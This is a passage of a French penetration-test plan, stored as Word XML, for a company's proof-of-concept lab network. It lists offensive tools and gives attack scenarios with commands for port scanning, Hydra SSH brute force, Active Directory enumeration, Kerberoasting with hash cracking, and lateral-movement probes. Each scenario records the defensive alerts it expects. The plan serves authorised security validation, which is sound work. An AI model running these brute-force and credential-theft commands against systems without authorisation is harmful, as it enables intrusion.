        <w:t xml:space="preserve">L’infrastructure réseau physique (box opérateur).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les postes de travail des utilisateurs finaux (non déployés dans le PoC).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="26" w:name="modes-de-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Modes de test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="mode-1-externe-internet"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mode 1 — Externe (Internet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Position de l’attaquant : depuis le réseau 192.168.1.x (simule Internet).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Objectif : identifier la surface exposée, tenter intrusion sans aucun accès interne.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="mode-2-interne-authentifié-vpn-openvpn"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mode 2 — Interne authentifié (VPN OpenVPN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Position de l’attaquant : commercial légitime connecté via OpenVPN.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Objectif : tenter l’élévation de privilèges, le mouvement latéral vers les zones non autorisées.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="mode-3-interne-compromis-vm-users"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mode 3 — Interne compromis (VM USERS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Position de l’attaquant : VM Linux temporaire posée en VLAN 30 USERS (simulant un poste utilisateur compromis).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Objectif : démontrer la limite de propagation post-compromission.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5" w:name="boîte-à-outils"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Boîte à outils</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="reconnaissance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Reconnaissance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Nmap</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">7.94+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Découverte hôtes + services + fingerprint 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Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scan rapide port TCP/UDP grandes plages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whatweb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fingerprint applications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dnsenum / dnsrecon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération DNS du domaine</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nova.local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enum4linux-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération SMB / Samba / AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="analyse-de-vulnérabilités"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Analyse de vulnérabilités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OpenVAS / Greenbone CE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scan vulnérabilités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Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scan vulnérabilités serveurs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WPScan</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(si CMS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scan WordPress / similaire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Nuclei</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(templates communautaires)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests par patterns connus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searchsploit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Exploit-DB local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Recherche d’exploits sur les versions identifiées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="tests-applicatifs-web"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Tests applicatifs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Burp Suite Community</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proxy interception + Repeater + Intruder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sqlmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Détection / exploitation SQL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dirb / gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute force répertoires &amp; fichiers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ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fuzzing paramètres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="authentification-credentials"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Authentification &amp;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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute force protocoles (SSH, HTTP, FTP, SMTP)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CrackMapExec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération + lateral movement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the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cassage hashs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Responder</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(si LLMNR/NBT-NS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capture credentials NTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="active-directory-spécifique"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Active Directory spécifique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BloodHound</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ SharpHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cartographie des relations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impacket-suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kerberoasting, AS-REP roasting, Pass-the-Hash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ldapsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération LDAP basique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="sécurité-réseau"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Sécurité réseau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Wireshark</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/ tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capture trafic + analyse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Aircrack-ng</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(si WiFi étudié)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hors scope actuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="post-exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7 Post-exploitation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Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exploitation modulaire + post-exploit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linPEAS / winPEAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Énumération privilèges locaux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mimikatz</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Windows uniquement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hors scope (pas de Windows)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6" w:name="scénarios-dattaque"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Scénarios d’attaque</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="36" w:name="scénario-s1-reconnaissance-externe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Scénario S1 — Reconnaissance externe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cartographier la surface exposée Internet de Nova Syndicate.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Découverte hôtes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-sn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan ports sur OPNsense Lyon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-T4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan UDP top 100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53,123,161,500,4500 192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Fingerprint 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192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Identification banners (SSH version, etc.)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-nv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.166 2222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Port 443 (HTTPS GUI OPNsense) accessible depuis 192.168.1.0/24.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Port 2222 (NAT SSH Bastion) accessible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Pas d’autres ports ouverts.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Suricata doit déclencher des alertes pour le scan.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T1595 Active Scanning, T1592 Gather Victim Host Information.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="scénario-s2-brute-force-ssh-bastion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Scénario S2 — Brute force SSH Bastion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tenter une attaque par force brute sur le bastion SSH.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Préparation wordlist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-1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt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short.txt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"novaadmin"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users.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Brute force avec Hydra</w:t>
      </w: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users.txt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short.txt ssh://192.168.1.166:2222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Fail2ban doit bannir l’IP après 5 échecs (configurable).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Wazuh doit générer une alerte (rule ID 5710 sshd brute force).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Suricata peut aussi déclencher (signature SSH brute force).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T1110.001 Password Guessing, T1110.003 Password Spraying.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="scénario-s3-énumération-web-proxy-01"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Scénario S3 — Énumération web (Proxy-01)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identifier la version du serveur web, les chemins exposés, les vulnérabilités OWASP.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Fingerprint</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan Nikto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nikto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https://192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Énumération dossiers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster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https://192.168.1.166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/usr/share/wordlists/dirb/common.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-k</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test entêtes sécurité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https://192.168.1.166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Headers de sécurité (CSP, HSTS, X-Frame-Options) à vérifier.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cipher suites TLS (recommandé : minimum TLS 1.2 avec FS).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Aucune CMS exposée publiquement (Nextcloud devrait être restreinte).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T1592.002 Software, T1190 Exploit Public-Facing Application.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="scénario-s4-brute-force-openvpn"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Scénario S4 — Brute force OpenVPN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tester la résistance du portail OpenVPN aux attaques par force brute.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Identification port OpenVPN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1194 192.168.1.166</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test connexion avec wrong creds</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">openvpn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--client-config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client.ovpn  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># avec mauvais user/pass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Auth OpenVPN repose sur AD (Samba) → Fail2ban doit protéger.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Logs OPNsense OpenVPN doivent montrer les échecs.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="scénario-s5-énumération-ad-depuis-vpn"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Scénario S5 — Énumération AD depuis VPN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depuis une session VPN légitime (commercial), tenter de cartographier l’AD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Préparation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: créer un compte VPN test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“alice”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lui attribuer minimum droits.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Énumération anonyme SMB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux-ng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10.1.10.10</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Énumération LDAP (avec creds alice)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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ldap://10.1.10.10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"alice@nova.local"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'&lt;password&gt;'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"dc=nova,dc=local"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"(objectClass=user)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sAMAccountName</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cartographie BloodHound</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bloodhound-python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alice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'&lt;password&gt;'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nova.local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-dc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dc01-lyon.nova.local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Énumération anonyme : doit être bloquée (Samba 4 par défaut).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Énumération authentifiée : possible (normal pour un user du domaine).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- BloodHound peut révéler des chemins d’élévation potentiels (Kerberoasting si comptes service vulnérables).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T1087.002 Domain Account, T1018 Remote System Discovery.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="scénario-s6-kerberoasting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Scénario S6 — Kerberoasting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exploiter un compte service AD pour récupérer un hash Kerberos crackable.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Avec creds compromis (alice)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GetUserSPNs.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nova.local/alice:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;password&gt;'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-dc-ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.1.10.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tenter de cracker le hash récupéré</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat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13100 hash.txt /usr/share/wordlists/rockyou.txt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Si comptes service avec SPN existent avec mots de passe faibles → vulnérabilité.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sinon : pas de SPN exploitable → protection OK.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T1558.003 Kerberoasting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="X4833d2a4dbc55ef63badb68f96cd1bc0ed2e773"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.7 Scénario S7 — Mouvement latéral DMZ → SERVERS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depuis une VM DMZ compromise (simulée), tenter d’atteindre les SERVERS.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Sur Web-01 (DMZ) compromise simulée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3 10.1.10.10        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ping DC01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10.1.10.10 22         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># tentative SSH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10.1.10.30 3306       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># tentative MySQL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tentative scan large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10.1.10.0/24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Ping DC01 : bloqué par firewall OPNsense (DMZ ne peut pas pinger SERVERS).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- SSH 10.1.10.10:22 : refusé.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- MySQL 10.1.10.30:3306 : seul Web-01 → DB-01 est autorisé sur ce port (règle whitelist).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
